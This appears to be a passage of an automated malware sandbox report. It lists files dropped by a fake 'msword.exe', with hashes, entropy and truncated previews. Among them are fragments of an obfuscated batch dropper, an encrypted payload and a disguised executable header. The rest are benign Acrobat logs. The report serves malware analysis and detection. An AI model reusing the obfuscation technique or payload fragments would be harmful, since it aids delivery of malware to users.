Preview:	..=DxL..=HxL...\|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......\|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I..........Vj.P....I..E$.G..E..G<.E .G@.E.P.7..4.I..E.+E.GD.E.+E.j.j..GH....I.Pj0.7....I.j.W..wL..\....=.wL..u.h..@.j(j.j.....I...wL....wL...wL.j..5.xL..G................_^[..]. .3........."......'....M..P....M..R...U..}..W..wL.........xL....t{..xL.3.V....0...M.8V:t..V:9............}.........t...td...t....tQ...tC~)....1.~8.uVWQ....I....t....t..u..#0...F8.3.@^_]...3........}......F8.....

C:\Users\user\AppData\Local\Temp\Phpbb

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	ASCII text, with very long lines (449), with CRLF line terminators
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.189766528618456
Encrypted:	false
SSDEEP:	192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
MD5:	3D5A3A147ED08ACC8A92B1B79225B16C
SHA1:	E9E24609206C346DF77B7E49E48838604765339D
SHA-256:	D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
SHA-512:	8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
Malicious:	false
Preview:	Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie

C:\Users\user\AppData\Local\Temp\Phpbb.bat

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (449), with CRLF line terminators
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.189766528618456
Encrypted:	false
SSDEEP:	192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
MD5:	3D5A3A147ED08ACC8A92B1B79225B16C
SHA1:	E9E24609206C346DF77B7E49E48838604765339D
SHA-256:	D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
SHA-512:	8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
Malicious:	false
Preview:	Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie

C:\Users\user\AppData\Local\Temp\Response

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	78848
Entropy (8bit):	7.997642474583827
Encrypted:	true
SSDEEP:	1536:C8rW6c7wZq1wCXK1yDWHgpipHZAGuQetnB3vzrCtvPCoj2fQCyqMsgkE:dK7wZdCX3zopyyet1fmvPCToq8
MD5:	1C2CD5510A8B8BE255D26B74FBFC61EF
SHA1:	8DD84BE3314E46C2A41BFBD2D9873859D3F88B54
SHA-256:	8F7445D8F645AF42CC36F82642DF091756CF5DF22C5E32E695C5EB999194B0E5
SHA-512:	E0CE8FDB77E40CB073A0FEEDDCBCFF075439F601224374445E578B4BC02AC01B3A114E0612D7A6D90214F1D4AC2ACFE380DF4E8DBD3E428A8D9496E39C4F22A7
Malicious:	false
Preview:	>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.\|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V.......U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W....u...a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-\|Cdg.L.........J.8{\| ..5...-.h....!.... f.W..p.^....&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

C:\Users\user\AppData\Local\Temp\Statistical

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	7938
Entropy (8bit):	6.234825901896176
Encrypted:	false
SSDEEP:	192:BHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3ygxn:BHAHhww+/2nlP3r1WAL3yQn
MD5:	E65ADD0B46D5C8C0DEC008C11CBD71A5
SHA1:	894028D96A4649AC5403F3CE0FAF0C686AED4E32
SHA-256:	17610DA19952CEA20324EA64C7D6A8F27F21C639845F1C14B21194A0F5C2EA99
SHA-512:	B5FF13313576084EE8B0631F4F7D2518186165D25F7AB3DF7273A8CEF2D47E1DF322602A36441A4072A94B1F5E55D75DC5706CF92DBCAAD72B29B9E397BE6649
Malicious:	false
Preview:	DimPieLilHot..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1gdyw3o0.znr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_diyr54ko.bqo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eguwewbp.1io.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkxgtfet.ffs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt50v3kz.lyn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q005brbi.ip0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qitx1au1.5i4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzocqic0.vao.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-10 03-48-07-794.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.376360055978702
Encrypted:	false
SSDEEP:	384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
MD5:	1336667A75083BF81E2632FABAA88B67
SHA1:	46E40800B27D95DAED0DBB830E0D0BA85C031D40
SHA-256:	F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
SHA-512:	D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
Malicious:	false
Preview:	SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.326290464795858
Encrypted:	false
SSDEEP:	384:kQOdGg/ZiX+YHZqHrd4xVWv1V2EkIYkWy9G0SW0B+jHjMcMKYS6N3R8D8BUxfgmS:Wvk
MD5:	0DD627E1D83195766F7FC605282A8107
SHA1:	65BA0E45EE30E1E76B61A09B8B8787F0B5D60859
SHA-256:	389225C9625A01D563256BAEB903FC8ECB50C6BBB59B7B032DC9D8A7AF64F653
SHA-512:	9B9ADD3983B94B166E42B17455E458FB2E009DBFE6AE59E920B92EF30324E818617A8B2F01411A1E6323357ADB9F19AB649EB5F26996CFB9B417E7DA5C4EFD3A
Malicious:	false
Preview:	SessionID=c04d1d9d-c82a-47c0-b011-de9d6bd107bd.1733820487805 Timestamp=2024-12-10T03:48:07:805-0500 ThreadID=3652 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=c04d1d9d-c82a-47c0-b011-de9d6bd107bd.1733820487805 Timestamp=2024-12-10T03:48:07:806-0500 ThreadID=3652 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=c04d1d9d-c82a-47c0-b011-de9d6bd107bd.1733820487805 Timestamp=2024-12-10T03:48:07:806-0500 ThreadID=3652 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=c04d1d9d-c82a-47c0-b011-de9d6bd107bd.1733820487805 Timestamp=2024-12-10T03:48:07:806-0500 ThreadID=3652 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=c04d1d9d-c82a-47c0-b011-de9d6bd107bd.1733820487805 Timestamp=2024-12-10T03:48:07:806-0500 ThreadID=3652 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.395628045289111
Encrypted:	false
SSDEEP:	768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbt:8u
MD5:	B905F8456269C867D2B6118526113E45
SHA1:	9736742CEECE82B1DB00CFB090B34A8416B32B26
SHA-256:	2545F0CD00D28E38F7E52FF5F5909A956B83E6099CB57A064F42AE45A2701AFA
SHA-512:	610D509EE7F3D40D73E167587E7921D660093E7E4E8CA58DE83870B50117D405414E7CD52AF5C3BB69B80E97DC2A7018D71178EE7D17FF3C5CDE8E4E24EAF475
Malicious:	false
Preview:	04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : *************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***********************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\60d170dc-0c73-4483-9d89-d44f98dd94d2.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/YkwYIGNP4Xdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:DwZG6n3mlind9i4ufFXpAXkrfUs0qWLk
MD5:	A87EA7DB768022E07A7E91B32957113C
SHA1:	91C6BC2E5BB35EE711913BEBB01042C6B7657FC1
SHA-256:	7B6A2D45E93955FF9D1E8BDF70F929E84928AD28FF4DDC448DC9873288D97800
SHA-512:	3F6DE4FCF11F8EF237918E6A0345D082034A76B7445F9DE023D533DE1B39D46D97CD7588CE7645A012A98721910E4E2D8C7E6728999245DE9D1CBB29A6A59F51
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\7389100c-b5c4-4998-8ada-4e7067afb4b7.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\8619ba05-4a6b-46b1-b143-26c333fbb1a3.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
MD5:	95F182500FC92778102336D2D5AADCC8
SHA1:	BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
SHA-256:	9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
SHA-512:	D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\8fa8df8d-7643-47b5-bec9-d770114da2f7.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
